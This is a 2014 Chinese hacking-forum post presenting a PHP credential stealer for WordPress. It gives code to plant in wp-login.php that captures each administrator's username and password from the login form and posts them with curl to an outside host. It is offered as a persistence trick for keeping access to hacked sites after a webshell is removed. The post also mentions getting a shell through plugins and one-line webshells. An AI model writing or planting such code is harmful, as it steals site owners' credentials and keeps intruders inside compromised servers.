搜索
查看: 561|回复: 0

wordpress记录管理员密码姿势

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-6-1 12:51:36 | 显示全部楼层 |阅读模式
  1.     if ($_POST['log']!='' && $_POST['pwd']!=''){
  2.         $postdata = "data=".$_POST['log'].'----'.$_POST['pwd']."\r\n";
  3.         $ch = curl_init();
  4.         curl_setopt($ch, CURLOPT_URL, "http://www.baidu.com/dict.php");
  5.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  6.         curl_setopt($ch, CURLOPT_HEADER, 0);
  7.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  8.         curl_setopt($ch, CURLOPT_POST, 1);
  9.         curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
  10.         curl_exec($ch);
  11.         curl_close($ch);
  12.         }
复制代码

代码如上,总所周知只要搞进普通WordPress后台就可以很轻松从插件拿shell,各种你一句话什么的。。。

当然,聪明的站长很多。所以你要做好shell会掉的心理准备。那我们就在wp-login.php再插如上代码进去就可以了

- -每登录一次记录一次,而且不存本地。。。管理员一登录大伙们又留shell去- -,而且姿势不错,,,哪个管理员会蛋疼的去翻登录页面的代码呢。。。

至于代码插哪里,自己看着办,会一两门编程的大概都懂了。。。。这些猥琐淫荡的小技巧公布出来而已。要写出来相信很多人都能写出来。。。
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表